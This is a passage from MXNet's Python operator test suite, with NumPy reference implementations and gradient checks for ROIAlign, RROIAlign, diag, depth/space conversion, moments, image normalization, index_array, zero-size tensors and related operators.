(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_device()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_device()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_device()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for _ in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'log_sigmoid', 'mish', 'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
